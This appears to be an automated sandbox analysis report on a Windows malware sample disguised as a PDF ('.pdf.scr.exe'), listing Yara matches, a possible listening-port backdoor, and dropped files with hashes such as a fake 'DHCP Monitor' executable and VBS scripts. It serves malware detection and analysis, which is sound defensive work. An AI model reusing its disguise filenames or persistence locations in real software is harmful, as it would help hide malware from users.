Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		2_2_00392163
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		2_2_00391B61

Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	796783
Product:	CloudBasic
Start time:	08:08:12
Start date:	02.02.2023
Sample:	026910003102350.pdf.scr.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	c2a80ccf6362bba805072de9ce963ea5
SHA1:	c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256:	592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2867A3817C9245F7CF518524DFD18F28	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log	ASCII text, with CRLF line terminators	8C0458BB9EA02D50565175E38D577E35	F0B50702CD6470F3C17D637908F83212FDBDB2F2	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log	ASCII text, with CRLF line terminators	8C0458BB9EA02D50565175E38D577E35	F0B50702CD6470F3C17D637908F83212FDBDB2F2	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
C:\Users\user\AppData\Local\Temp\Folder8_410\Update.vbs	ASCII text, with no line terminators	C3DAE34C95AFBA3A4E22F956B6761EF7	8DD9C50F51E1D8FA7492922AE3E05C8526824D88	60DFA2FD6C51979E9A3E669F487471408474A5ABB43FFFF5536160401FB0712F
C:\Users\user\AppData\Local\Temp\Folder8_410\accdciolx.icm	Unicode text, UTF-8 text, with CRLF line terminators	9D23B8A8A8DC43EC163438D3E58CDB4E	083823FFA163D66242EC8E04AD9C9A02A3F5F32E	D249EC95400898681404C2D824E77651C8D8ACFFEBE92F51BC6D337DF11DB895
C:\Users\user\AppData\Local\Temp\Folder8_410\adietmenbj.mp3	Unicode text, UTF-8 text, with CRLF line terminators	2732EEA4B454A9C18455717D791AA346	6E3F73A1A0ADEA9FDBAE17F9E0208D6AD08B05EC	64E99289977F284CE1C930F9E27A813C60C4F379E3E38F845E4EF11703ADE375
C:\Users\user\AppData\Local\Temp\Folder8_410\cgkjjhlj.icm	Unicode text, UTF-8 text, with CRLF line terminators	B999711E1C647771E59A27D40F75E908	E1DBE34813EF6241B4B227042649805372321794	6A9A2E454761426D0B07209E1958C520D008D8EFAABB12CFAFE777C15B0FA562
C:\Users\user\AppData\Local\Temp\Folder8_410\chcekckp.gfh	ASCII text, with very long lines (65536), with no line terminators	48F9952AAAFE4CA15D39581E78889AC0	569F6FB010FEFB412192A968784DB355B8311853	7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
C:\Users\user\AppData\Local\Temp\Folder8_410\daitsfsh-waune.icm.vbe	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F96269E1056B12E82772B66B0884F8A6	C4D4F2D680A1A95B3FE3462A0F2CF80DC5DD8B05	2A8C2D73D15B644CFCB109F61099B5501C706CD539D885C3929E35F636A886B8
C:\Users\user\AppData\Local\Temp\Folder8_410\dbhplsxd.msc	Unicode text, UTF-8 text, with CRLF line terminators	E96279C4B834A0D1348BA98595380443	B6857B68DE2711C498632D7FAE63702F800B29A0	E9BC070312838661A856486A6D4433C46AB42AD7C18FA0D0D56943838B44F125
C:\Users\user\AppData\Local\Temp\Folder8_410\dldgexp.dll	Unicode text, UTF-8 text, with CRLF line terminators	06FEEDE36DB05B3D230E3081419A19A2	2D69F4B7F32BB925AA0CE16208F36BF5FE052F19	76C4B7C04D21D13CA2B8344485033B11A3631C04F9F3F0EF55C466A443EBBEAD
C:\Users\user\AppData\Local\Temp\Folder8_410\fedenpfm.xml	Unicode text, UTF-8 text, with CRLF line terminators	5068F342795DD0ABC182D3E210DEA3DC	D19EF854A23175FB29C2E4477DD9FEBAACD7F113	1938E80FD584E5F0AEA8FB71CEC826411B8E69F8541EAE8C820315462A9053B3
C:\Users\user\AppData\Local\Temp\Folder8_410\gfgrxolm.dat	Unicode text, UTF-8 text, with CRLF line terminators	DBC9AC22BDEEB8CD96BBAECD453652C1	089BD73581553744ADBA703B7254B0238C8C3E30	1F9293BE18FEB28F2FB505E0C14660FD0CE8930A5FB8644EB908F187643C9C07
C:\Users\user\AppData\Local\Temp\Folder8_410\gvcjf.ppt	Unicode text, UTF-8 text, with CRLF line terminators	C516FA4A75BF057057BE211416395C0F	04E8F9798E788912ED41BEC8BBB0DF98662D5271	D897EE20C42EE8D2DC2E1950F12FB254C62931DBC840D971FF26E45967045771
C:\Users\user\AppData\Local\Temp\Folder8_410\gvguxlvv.xls	Unicode text, UTF-8 text, with CRLF line terminators	DCC586BBC725E3FFB47CADEE31309C8E	D3630384B5A6D579453AB671607F8E51AE9C8CDA	6B9C0567140D3565DD3B1D56C6B18E424DD6C1E0AE2F3DB521F234B9F108EE16
C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8A57722EC9067FAAA9FF2980C5F02838	F528308591C99004567DD76123E6D241ECDB5817	3097D4413844FA305E10FB19DA3086848F2F3715B5B877E2F8691997BC25CD25
C:\Users\user\AppData\Local\Temp\Folder8_410\kulqol.dat	Unicode text, UTF-8 text, with CRLF line terminators	DECFF247A10D1AB7F53AA5D798ECA2F7	E5DB2B53CB14488EC5EDD81D7CDE5FA53A11E837	AC3428221792D658F6690BAB568201DB966D220EBB29E3426877941810DA4A96
C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini	Unicode text, UTF-8 text, with CRLF line terminators	0F4EF68A2745715CF4B89D383968D0EB	50D039BF131F5F11EC21E7EEBF7E22B81937C0A5	173AA7C8B7671410C3F73767A1DFE2711403B3F045DBF9825BDB115BF13B2D8F
C:\Users\user\AppData\Local\Temp\Folder8_410\ldgreqiiqi.msc	Unicode text, UTF-8 text, with CRLF line terminators	DDAA651BD0ED9660CE485161F3DA0A31	F209147B7A434D9FF63997C57634694DD51E70C5	6688EA36289339B7E8ABC74401F8338F14C7B824BEA4C56ACDEAE1082228B693
C:\Users\user\AppData\Local\Temp\Folder8_410\lhtfibp.docx	Unicode text, UTF-8 text, with CRLF line terminators	C43B0D8E855F60BC8988C239AE91430E	38A9CC908239A6174A8C6CDD07DF2E65ED03C557	F63FD422159E07439272BB6B603C3EB696C785AED53DBB0C693F9A9343869B89
C:\Users\user\AppData\Local\Temp\Folder8_410\lulajc.bmp	Unicode text, UTF-8 text, with CRLF line terminators	165255E5120FD4986C2B288F9FCAB09F	8CB0C248BB9A4BA714EA6739C74C1DE960BC7343	CD7EC8254B748B3FE738147E27DF2FD3F7643D02835A46B15E93ECD060D06581
C:\Users\user\AppData\Local\Temp\Folder8_410\lvgkma.msc	ASCII text, with CRLF line terminators	3016649ED3E9A031DA118886A15144F7	58913D264B171A708F3AB825B14C096E47112677	429880966442E56D685B62933A30BB780092C5B664C7E546AEA2B3CAB49945CE
C:\Users\user\AppData\Local\Temp\Folder8_410\mlvmtln.bin	Unicode text, UTF-8 text, with CRLF line terminators	5B2FFEFEDF016705B02E548D343BD273	71C0005C0BB5259D7A8DF04607DB55E1DC48CFDF	AE355FD9415586E5D427089E8E8E279A6F1BAAAC4CE24A9FA2039F0B9598BAD8
C:\Users\user\AppData\Local\Temp\Folder8_410\mujswngck.docx	Unicode text, UTF-8 text, with CRLF line terminators	EA84F04FF07EFE4DD573DF81C8D73112	56C7C452FDF7EC05DF7EEED80019520B4636636E	51948EA1E1786F3639B5688CF099946AFEEC48A6DB2B4151E2340CDA19113607
C:\Users\user\AppData\Local\Temp\Folder8_410\nbmc.pdf	Unicode text, UTF-8 text, with CRLF line terminators	2E80CBC3177C60A2048EFD086D26DB0C	60011CEE58CDCE00026D09516C147445A399265C	ADB88228E475C736251FD3A11BC7FB41F536FC8F0B80EA7C977153C054AB48FB
C:\Users\user\AppData\Local\Temp\Folder8_410\quxisn.ini	Unicode text, UTF-8 text, with CRLF line terminators	BD2C67C8D59FE4FA46C2BD40B65F2014	303E8754D55A90565DC43581367644F3CF7F3A7A	3AC63CC62CAEB2B9CA24141616FA10AEF0C64EA6721AB16B8B3E33878B09098D
C:\Users\user\AppData\Local\Temp\Folder8_410\rbtj.dat	Unicode text, UTF-8 text, with CRLF line terminators	B4D931185A25EC221C09C2E0C7DE0409	3580DF306627E9BE85243FDDE91165A24279273A	508D3E6C83EF0A34BEBB22F6EE99B11A7214CED3E0748D1D4C751ACA8CCA7C71
C:\Users\user\AppData\Local\Temp\Folder8_410\rnnsh.xls	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1A4F87FE68FAF07769D93372246F7315	756DBF9A1C5C60FA13B3285DF696C370C117A9AD	AE5869183348BB70CDF4745B2629425B3DC5B9A96A9DCDE7862AC9F0BC97E346
C:\Users\user\AppData\Local\Temp\Folder8_410\tpfplabhr.ppt	Unicode text, UTF-8 text, with CRLF line terminators	62058854A3A0211391D23AFE642D51C5	4333B74DCE3F8564D4156F2D11B66069EE3372F2	D8E824CBC1D0F179F3733A2B5508200335A6EC646226F0B023E9FB4F94EA6CDE
C:\Users\user\AppData\Local\Temp\Folder8_410\vgbluarp.xl	Unicode text, UTF-8 text, with CRLF line terminators	9F994AFD9BB142AB8A36D4C58F102F93	8DCB457E7F5EC4BB6B7E32305DD26A4F8D2A681E	BD5CD1567D60D85D393A1DDCA22A737C89C1B3A3E5A7F8A772BFDE48B8CEA3B6
C:\Users\user\AppData\Local\Temp\Folder8_410\vgpgtuex.bmp	Unicode text, UTF-8 text, with CRLF line terminators	7D0D7010210F47BBC571277006C8C174	73ED48688E61A32FC3A92E1099C411825FF5E59A	814C2970E6246BF86415067D9780E8E2F1DD9EAF947C6BC425A815E749A08042
C:\Users\user\AppData\Local\Temp\Folder8_410\vjdtaskm.txt	Unicode text, UTF-8 text, with CRLF line terminators	166AD43D9C2CA35E2F55412A6ED8B515	5A5E8831BABF7E9FC4233417AA04046D45FFFC57	4CB41D553941E698BD92DD077AE3CCE0E4ECA9DCCA9EAF2C3EA76C48C3A9A26E
C:\Users\user\AppData\Local\Temp\Folder8_410\vtmv.xls	Unicode text, UTF-8 text, with CRLF line terminators	02C0FBC15743BE076F645E223C92ACCB	76DB0F874C4462B5DED61D9104FCEC0E3C95D273	C74821B50B9A993F24F4BB8788FF69A77A96C4A19DE69711564C26103D6D3F68
C:\Users\user\AppData\Local\Temp\Folder8_410\xnhbpesj.pdf	Unicode text, UTF-8 text, with CRLF line terminators	CE86D4806786B5285DC23D378067A353	0D61DE00AC334DCBDA6B3E320E880DFADB2482C3	24FD150DC97AC04C8D9AA8F482A994788D5B77578B16B6028B9980249FC724A8
C:\Users\user\AppData\Local\Temp\Folder8_410\xopcgkw.xl	Unicode text, UTF-8 text, with CRLF line terminators	55F53F4F242C0DB1E519E3E72DEED805	E9B4CC8F1401B641B5ACA044BF0379C1C2D653F4	8E858683D645E559E93B7F3C2AD65E847A2EAAADF434190AC8278DDE580BA874
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	2867A3817C9245F7CF518524DFD18F28	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
C:\Users\user\AppData\Local\Temp\tmp897A.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	77AF6D1744407EBD7E0CEC16F3C7168D	FF4E58917D1AB719E40C68542F663121299DAE67	A519EB5414D05AC7565B5399D9F1EF717D6846695221B21B51820AA69120EDDC
C:\Users\user\AppData\Local\Temp\tmp8D34.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	5C2F41CFC6F988C859DA7D727AC2B62A	68999C85FC7E37BAB9216E0099836D40D4545C1C	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat	data	6C844091DCB061AD2B62761D1939F235	813C89B6606B3A5510FD924A02BAFCC6FE2B8574	FBC2997715CCA9BD5F3F08FB0FABD33DD3D13489C40E47952208ED854127AA2C
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat	ASCII text, with no line terminators	E01C7B4BFFC4D8966DFDD6831E4904F7	FE638E970FB82742E2C4D7EA3AE7E043589304FB	ECFA3D73848685C232F4B352A5E24F4995B7D55FF4130A26B7BAEB3839280300
C:\Users\user\temp\lvgkma.msc	ASCII text, with CRLF line terminators	B48D7F5C0CC7E6A4C737BE0D827B9867	906E2605871B8F319FA2A455C06F2E53940ED777	B2BACD88BAFE8C668A45AB03A2D5647A9BDDA6CF1361FC821D5A70480B8CCB69
\Device\ConDrv	ASCII text, with CRLF line terminators	1AEB3A784552CFD2AEDEDC1D43A97A4F	804286AB9F8B3DE053222826A69A7CDA3492411A	0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293

Windows Analysis Report 026910003102350.pdf.scr.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
026910003102350.pdf.scr.exe